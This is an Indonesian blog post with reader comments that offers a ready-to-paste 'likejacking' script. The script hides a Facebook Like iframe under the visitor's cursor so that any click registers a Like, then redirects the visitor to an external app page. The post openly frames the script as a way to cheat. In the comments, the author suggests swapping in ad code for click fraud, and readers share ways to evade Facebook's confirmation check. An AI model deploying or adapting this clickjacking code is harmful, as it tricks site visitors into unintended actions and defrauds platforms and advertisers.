Script Facebook Likejacking, Cara Curang Like Facebook

Script Facebook Likejacking, Cara Curang Like Facebook - Lagi-lagi facebook ya sob hehe..memang tidak ada habisnya kalau ngomongin jejaring sosial yang satu ini. Dunia serasa tidak terbatas dan sangat kecil ya sob, mau ketemu orang luar negeri aja gak perlu kesana, sudah bisa dengan fasilitas facebook. Nah posting kali ini ditujukan untuk mencurangi facebook, ya mencurangi facebook...kok main curang sih? lha ane kan tahu kesenangan sobat, suka yang instan-instan dan curang-curang hehe..
Nah posting ini berjudul Script Facebook Likejacking, Cara Curang Like Facebook, ketahuan kan tujuannya? ya tujuannya adalah membuat pengunjung blog akan selalu mengklik tombol like pada halaman/page sobat sekalian. Keren kan? mau tahu Script Facebook Likejacking, Cara Curang Like Facebook? silahkan copy-paste script dibawah ini di blog sobat (gunakan widget HTML/Javascript)

<script src="http://code.jquery.com/jquery-1.5.js"></script> <style>
html, body { margin: 0; padding: 0; width: 100%; height: 100%; overflow: hidden; }
div.wrapper { width: 100%; height: 100%; overflow: auto; }
img.bg { min-height: 100%; min-width: 1024px; width: 100%; height: 100%; position: fixed; top: 0; left: 0;z-index: 0; }
@media screen and (max-width: 1024px) { img.bg { left: 50%; margin-left: -512px; } }
#content { text-align: center; position: absolute; width: 100%; height: 100%; top: 0; left: 0; color: #fff;font-family: 'palatino linotype', palatino; font-weight: normal; text-align: left; text-shadow: 0 1px 0 #000; z-index: 10; }
#content .description { position: relative; width: 580px; left: 50%; margin-left: -290px; }
#content .description h1 { font-size: 32px; }
#content .description .warning { color: #f00; }
#content .description .link, #content .description a { font-size: 22px; color: #fff; text-decoration:underline; }
#content .description .footer, #content .description .footer a { font-size: 10px; }
</style>


<span id="link" class="link">
<div id="content">




</div>
<div id="wrapper" style="position: absolute; opacity: 1; filter: alpha(opacity = 0); margin-left: -50px; z-index:100;">


<iframe src="//www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FRasecowebid%2F186314464729833&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:21px;" allowtransparency="true"></iframe>


<script>
FB.Event.subscribe('edge.create',function(response) {window.top.location.href = "http://apps.facebook.com/gandjarexe/";});
</script>
</div>
<script type="text/javascript">
jQuery( document ).ready( function() {
$( "#link" ).mousemove( function( e ) {
$( '#wrapper' ).css( {
top: e.pageY - 10,
left: e.pageX + 20
} );
} );
} )
</script>


</span>

Nah silahkan sobat ganti script teks yang berwarna merah dengan script likebox/like dari pages sobat.
Nah untuk melihat previewnya silahkan kunjungi http://gudangrpp.blogspot.com/
Gimana? mantap bukan?...

Berlangganan update artikel terbaru via email:

25 Responses to "Script Facebook Likejacking, Cara Curang Like Facebook"

  1. mantep gan...
    carcur biar makin banyak yang ngelike ya....

    BalasHapus
  2. yup gan, curang-curang dikit gak apa-apa hehe

    BalasHapus
  3. ko aku klik http://gudangrpp.blogspot.com/ malah tombol suka mlu gk rubah2 gan.. gman ne cara ya

    BalasHapus
  4. ya memang tombol "suka" akan selalu muncul mengikuti kursor gan, itulah namanya mencurangi agar klik tombol suka. Nah agan tinggal ganti tuh facebook pagenya punya agan..atau kalau mau lebih serem lagi, diganti aja tuh script "suka" facebook dengan script iklan semisal ad****camp, s*ti, kumpu***gger, dll tapi baca2 dulu TOS nya dari situs PPC tsb gan

    BalasHapus
  5. Sumpah mantap nih gan,, hahaa, dunia penuh kecurangan, tq infonya gan

    BalasHapus
  6. keren gan, tapi takutnya visitor malah pada kabur...
    http://www.initialDS.co.cc

    BalasHapus
  7. kalau pengunjung websitenya datang dari search engine kayaknya dipasang 1 atau 2 hari gak apa-apa gan (dalam 1 minggu), memang kalau pengunjung datang dari link promo kita via social networking bisa dipastikan mereka akan KABUR duluan :D

    BalasHapus
  8. wah sekarang ada keamananx bro... stelah di like 1x... truz ada konfirmasi, disuruh klik lagi langsung keluar pop up tentang halamanx yang akan di like....

    BalasHapus
  9. wah gitu ya bro..ane belum cek lagi scriptnya bro

    BalasHapus
  10. masbro Gilang L., barusan ane cobain masih bisa kok..coba deh cekidot

    BalasHapus
  11. ohh gt y..
    barusan kmaren ane coba bisa 100%, truz ane promosikan di facebook. truz besokx ane simulasi like kyk gitu tapi pake konfirmasi (keluar popup gitu).. ane pake wordpress pake server byethost.
    Apa mungkin web ane di blok ama FaceBook nya kali ya
    mohon bantuanx...

    BalasHapus
  12. kan kalo sudah like tombolnya berubah jadi abu2 gan, mungkin karena ente sudah ngelike sebelumnya.
    Kalo untuk masalah diblok bytehost kayaknya gak mungkin gan, dan pastinya domain agan TLD kan? gak mungkin deh diblok.
    Mungkin ada plugin/addon firefox yang ngeblok <'iframe> gan atau ngeblok javascript

    BalasHapus
  13. udh kmu coba tulis link blog kmu ke wall FB??
    soalnya likejacking yg ada di web ane bneran pake "konfirmasi" stelah gw post di wall FB...
    akhirnya ane akalin deh, ane hapus web ane, terus bkin website lg. terus gw tulis di wall FB pakai web lain yang nge-forward ke web likejacking ane jdi lbih aman :D

    BalasHapus
  14. ternyata ane tahu penyebabnya gan, ane kemaren bikin akun fb baru nah trus ane cobain mampir ke blog ane yang diatas itu linknya. Nah ternyata memang pake konfirmasi dulu. Sepertinya akun fb yang baru memang harus pake konfirmasi (atau mungkin karena belum verifikasi email)

    BalasHapus
  15. blm verifikasi email? ane blum nyoba kalo yg itu tpi FB qw yg udah diverifikasi jg konfirmasi di web qw dulu....

    btw blog kamu yang ini kn? http://gudangrpp.blogspot.com/

    gw coba blog kmu gpp koq msih bs...
    dh qw coba pke FB baru n FB lama. semuanya normal koq ;-)

    btw mnta tolong dong jdi tester di web baru ane (gak ada likejackingnya jd like nya di widget)..
    kalo udh, di unlike gpp :)
    www.mogishare.co.cc
    soalnya web yg satu ini jg keluar konfirmasi T_T

    BalasHapus
  16. oh begitu ya gan, berarti ga ngaruh fb lama ato baru.
    Ane barusan cobain ke website agan, kok ga bisa masuk? malah ke halaman http://securesignupoffers.net/d/

    BalasHapus
  17. iya barusan ke suspend akun byethost ane gara2 overbandwith T___T maklum ane pke byethost gratisan... di suspend 24 jam...
    nanti ane bkin lgi di server lain dah...

    Btw FB kmu apa? kali aja bs sharing2 :D

    BalasHapus
  18. akun fb ane search aja Zanuar Didik Bintoro gan

    BalasHapus
  19. Nyimak nih ane..

    Kalo misal tombol likenya disamarin bisa g gan?
    biar pengunjung gak curiga gitu..

    BalasHapus
  20. wah kalo disamarin kayaknya gak bisa sob

    BalasHapus
  21. Mantep infonya sob,,
    Ditunggu follow dan komentarnya
    http://tips-gobel.blogspot.com

    BalasHapus
  22. Bekerja 100% ngak nih gan.

    salam kenal dari http://bloggercungkring.blogspot.com/

    BalasHapus

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel